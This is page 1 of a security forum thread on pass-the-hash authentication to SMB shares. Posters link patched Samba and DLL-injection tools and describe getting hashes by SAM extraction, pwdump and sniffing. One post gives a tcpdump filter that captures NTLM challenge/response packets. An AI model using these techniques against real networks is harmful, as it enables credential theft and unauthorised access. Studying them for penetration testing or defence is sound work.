Page 1 of 2 12 LastLast
Results 1 to 10 of 16

Thread: Passing the hash for SMB shares

  1. #1
    Just burned his ISO
    Join Date
    Apr 2006
    Posts
    13

    Default Passing the hash for SMB shares

    Maybe you have heard about it since there is a little hype about it right now.

    Here's a short description of what passing the hash is all about:
    When you normally log in to a SMB share you have to enter your username/password combination.
    But the good thing is, you do not have to know the password when you know the password hash. That means you can log in to any SMB share where you do know the username/passwordhash combination.

    The main advantage is that Rainbow Tables for LM/NTLM hashes become redundant. You do not have to know the password.

    How does it work?
    To authenticate to a SMB share, the Samba client/Windows only uses the password hash but not the password, so all that has to be done is use a modified SMB client which takes the passwordhash.

    In summary all that is needed is a modified Samba client which uses username/passwordhash combination instead of username/password cominations!
    A modified Samba client can be found here:
    foofus.net/jmk/passhash.html

    More information on LM/NTLM authentication can be found here:
    heise-security.co.uk/articles/75235

    A SMB proxy can be found here:
    cqure.net/wp/?page_id=11

    For Windows, the passwordhash is changed using dll injection:
    oss.coresecurity.com/projects/pshtoolkit.htm
    hexale.blogspot.com
    truesecurity.se/blogs/murray/default.asp

  2. #2
    Just burned his ISO
    Join Date
    Apr 2006
    Posts
    13

    Default

    I've recently tried it and it worked!
    I just patched the samba source with the patch available here:
    foofus.net/jmk/passhash.html

    So it should not be to much work to include this in the next version but it would be a great new feature.

  3. #3
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Cool will have to test this out sometime.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  4. #4
    Junior Member
    Join Date
    Apr 2006
    Posts
    33

    Default

    but how do u find the password hash?

    (im learning)

  5. #5
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Sniff some network traffic, boot a system with a Linux CD and get a SAM extract, etc...
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  6. #6
    Just burned his ISO
    Join Date
    Apr 2006
    Posts
    13

    Default

    Quote Originally Posted by thorin View Post
    Sniff some network traffic, boot a system with a Linux CD and get a SAM extract, etc...
    No you cannot get the hash from network traffic. See heise-security.co.uk/articles/75235 for more details.

    The passing the hash technique becomes usefull when the administrator of your LAN has the same account on every machine so that he can remotely administer these machines. You are sitting on one of these machines and run pwdump or something like that....

  7. #7
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    I only skimmed it but I didn't see anything in that article that said you can't get it from network traffic, especially if the AD is maintaining lame NT4 compatability and there are NT4 systems on the network. In fact the picture on the second page shows the l0pht (?) option "Retrieve by sniffing the local network - Sniffing captures encrypted hashes in transit over your network....."
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  8. #8
    Just burned his ISO
    Join Date
    Apr 2006
    Posts
    13

    Default

    The relevant stuff for sniffing hashes in your LAN is on page three:
    heise-security.co.uk/articles/75235/2

    A windows machine never sends the hash itself across the LAN, even with LM hashes. The server sends a challenge to the client and the client encrypts the challenge with parts of the hash.

    But it's possible to crack a password using the data being sent across the LAN. This is possible because the challenge is sent unencrypted. The attacker encrypts the challenge with hashes (generated with passwords from a wordlist) and checks if the encrypted challenge matches the one the server accepted. With this attack you get the hash but you don't need it anymore since you do know the password.

  9. #9
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    Quote Originally Posted by hattrick View Post
    but how do u find the password hash?

    (im learning)
    A book I read a little while back explained it well:

    Sniff the traffic on 139 and/or 445. The challenge is 0x72 and the response is 0x73 @ byte 28

    tcpdump -nes 0 -w <file> tcp[28]=0x72 or tcp[28]=0x73 or tcp[40]=0x72 or tcp[40]=0x73
    dd if=/dev/swc666 of=/dev/wyze

  10. #10
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •